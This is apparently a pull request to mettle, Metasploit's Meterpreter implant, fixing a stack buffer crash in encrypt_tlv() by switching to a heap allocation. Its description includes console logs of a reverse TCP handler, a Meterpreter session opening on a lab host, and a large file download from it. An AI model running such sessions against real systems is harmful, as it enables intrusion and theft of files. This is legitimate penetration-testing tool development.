### PR TITLE
encrypt_tlv buffer fix

### DIFF
--- a/mettle/src/crypttlv.c
+++ b/mettle/src/crypttlv.c
@@ -1,5 +1,4 @@
 #include "crypttlv.h"
-#include "log.h"
 
 size_t aes_decrypt(struct tlv_encryption_ctx* ctx, const unsigned char* data, size_t data_len, unsigned char* result)
 {

--- a/mettle/src/crypttlv.c
+++ b/mettle/src/crypttlv.c
@@ -1,4 +1,5 @@
 #include "crypttlv.h"
+#include "log.h"
 
 size_t aes_decrypt(struct tlv_encryption_ctx* ctx, const unsigned char* data, size_t data_len, unsigned char* result)
 {
@@ -132,13 +133,16 @@ void * encrypt_tlv(struct tlv_encryption_ctx* ctx, void *p, size_t buf_len)
 						hdr->encryption_flags = htonl(ctx->flag);
 						unsigned char iv[AES_IV_LEN];
 						memcpy(iv, ctx->iv, AES_IV_LEN); // grab iv before enc manipulates it.
-						unsigned char result[enc_size];
-						memset(result, 0, enc_size);
-						if ((length = aes_encrypt(ctx, tlv_data, enc_size, result)) > 0) {
-							memcpy(tlv_data, iv, AES_IV_LEN);
-							memcpy(tlv_data + AES_IV_LEN, result, length);
-							tlv_len = length + AES_IV_LEN + TLV_MIN_LEN;
-							hdr->tlv.len = htonl(tlv_len);
+						unsigned char *result = calloc(enc_size, 1);
+						if (result) {
+							memset(result, 0, enc_size);
+							if ((length = aes_encrypt(ctx, tlv_data, enc_size, result)) > 0) {
+								memcpy(tlv_data, iv, AES_IV_LEN);
+								memcpy(tlv_data + AES_IV_LEN, result, length);
+								tlv_len = length + AES_IV_LEN + TLV_MIN_LEN;
+								hdr->tlv.len = htonl(tlv_len);
+							}
+							free(result);
 							break;
 						}
 					} else {


### PR DESCRIPTION
The `result` buffer in `encrypt_tlv()` could cause a segmentation fault depending on how much `enc_size` is. This changes the variable to be a dynamically-allocated buffer instead.

## Before fix

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3008420 bytes) to 192.168.37.175
[*] Meterpreter session 7 opened (192.168.37.1:4444 -> 192.168.37.175:48150) at 2021-03-19 13:18:34 -0500

meterpreter > download -b 200000000 /home/space/Desktop/bigger_lights.jpeg /Users/space/Desktop/mettle_stuff
[*] Downloading: /home/space/Desktop/bigger_lights.jpeg -> /Users/space/Desktop/mettle_stuff/bigger_lights.jpeg

[*] 192.168.37.175 - Meterpreter session 7 closed.  Reason: Died
```

## After fix

```
msf6 exploit(multi/handler) > run

[*] Started reverse TCP handler on 192.168.37.1:4444 
[*] Sending stage (3008420 bytes) to 192.168.37.175
[*] Meterpreter session 8 opened (192.168.37.1:4444 -> 192.168.37.175:48200) at 2021-03-19 13:28:14 -0500

meterpreter > download -b 200000000 /home/space/Desktop/bigger_lights.jpeg /Users/space/Desktop/mettle_stuff
[*] Downloading: /home/space/Desktop/bigger_lights.jpeg -> /Users/space/Desktop/mettle_stuff/bigger_lights.jpeg
[*] Downloaded 28.78 MiB of 28.78 MiB (100.0%): /home/space/Desktop/bigger_lights.jpeg -> /Users/space/Desktop/mettle_stuff/bigger_lights.jpeg
[*] download   : /home/space/Desktop/bigger_lights.jpeg -> /Users/space/Desktop/mettle_stuff/bigger_lights.jpeg
```